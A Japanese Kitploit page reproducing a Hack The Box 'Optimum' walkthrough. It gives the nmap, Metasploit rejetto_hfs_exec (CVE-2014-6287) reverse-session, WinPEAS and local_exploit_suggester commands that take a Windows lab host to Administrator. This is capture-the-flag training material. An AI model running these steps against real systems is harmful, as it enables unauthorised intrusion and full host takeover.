Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/r3fr4kt/optimum
特権昇格偵察脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトペネトレーションテスト学習と教育
GitHubr3fr4kt/optimum

Optimum

5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Hack The Box の Optimum マシンの Writeup です。このウォークスルーでは、Rejetto HttpFileServer 2.3(CVE-2014-6287)の悪用による初期アクセスの取得から、列挙テクニックとポストエクスプロイテーションツールを使用した Windows ホスト上での権限昇格までを解説します。

リポジトリを見る

Optimum


Optimum – Hack The Box 攻略記事

概要

このマシンでは、脆弱なWebサービスを悪用してWindowsホストへの初期アクセスを獲得し、その後権限を昇格して管理者フラグを取得することが目的です。

攻撃経路は以下のとおりです。

  • サービス列挙
  • Rejetto HTTP File Server 2.3 の悪用
  • Metasploit による初期アクセス
  • WinPEAS と Metasploit ポストエクスプロイテーションモジュール を使用した権限昇格

偵察

公開されているサービスを特定するために、フルTCPポートスキャンから開始します。

root@kitploit:~
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>

スキャンにより ポート80 が開いていることが判明します。

次に、サービスとバージョンのスキャンを実行します。

root@kitploit:~
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>

結果として、以下のサービスが特定されます。

root@kitploit:~
HttpFileServer 2.3

このサービスは、軽量なファイル共有Webサーバーである Rejetto HTTP File Server に該当します。


脆弱性の特定

検出されたバージョンを調査した結果、既知の脆弱性を発見します。

root@kitploit:~
CVE-2014-6287

この脆弱性は、不適切な入力サニタイズにより リモートコード実行 を可能にします。


悪用

脆弱性を悪用するために、Metasploit を使用します。

Metasploit を起動します:

root@kitploit:~
msfconsole -q

適切なモジュールを検索します:

root@kitploit:~
search rejetto

エクスプロイトモジュールを読み込みます:

root@kitploit:~
use exploit/windows/http/rejetto_hfs_exec

必要なオプションを設定します:

root@kitploit:~
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run

実行すると、エクスプロイトはターゲットマシン上に Meterpreter セッション を提供します。


初期アクセス

取得した Meterpreter セッションを使用して、ファイルシステムを移動し、ユーザーフラグ を取得します。

root@kitploit:~
cd
cat user.txt
whoami

コマンド出力から、次のユーザーとしてログインしていることがわかります。

root@kitploit:~
kostas

このユーザーには管理者権限がないため、権限昇格 に進みます。


権限昇格の列挙

潜在的な権限昇格ベクターを特定するために、よく知られたWindows権限昇格列挙ツールである WinPEAS をアップロードします。

root@kitploit:~
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe

次に、それを実行します:

root@kitploit:~
shell
.\wp.exe

出力には、ユーザー kostas に関連する資格情報を含む有用な情報が示されます。


権限昇格

可能な昇格ベクターを確認した後、以下の Metasploit モジュールを使用します。

root@kitploit:~
local_exploit_suggester

モジュールを読み込みます:

root@kitploit:~
use post/multi/recon/local_exploit_suggester

セッションを設定します:

root@kitploit:~
set SESSION <SESSION_NUMBER>
run

このモジュールは、権限昇格に使用できる可能性のあるローカルエクスプロイトを提案します。

権限昇格に成功すると、管理者権限を持つシェルを取得します。

検証:

root@kitploit:~
shell
whoami

管理者アクセス

管理者権限を取得したら、Administrator ディレクトリに移動して ルートフラグ を取得します。

root@kitploit:~
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt

重要な教訓

このマシンは、いくつかの重要なペネトレーションテストの概念を示しています。

  • 適切な サービス列挙 は、脆弱なソフトウェアを特定するために重要です。
  • CVE-2014-6287 のような既知の脆弱性は、即座にリモートコード実行につながる可能性があります。
  • WinPEAS のようなツールは、Windows環境における権限昇格の機会を特定するのに役立ちます。
  • Metasploit ポストエクスプロイテーションモジュール は、権限昇格プロセスを迅速化できます。
ツールをダウンロード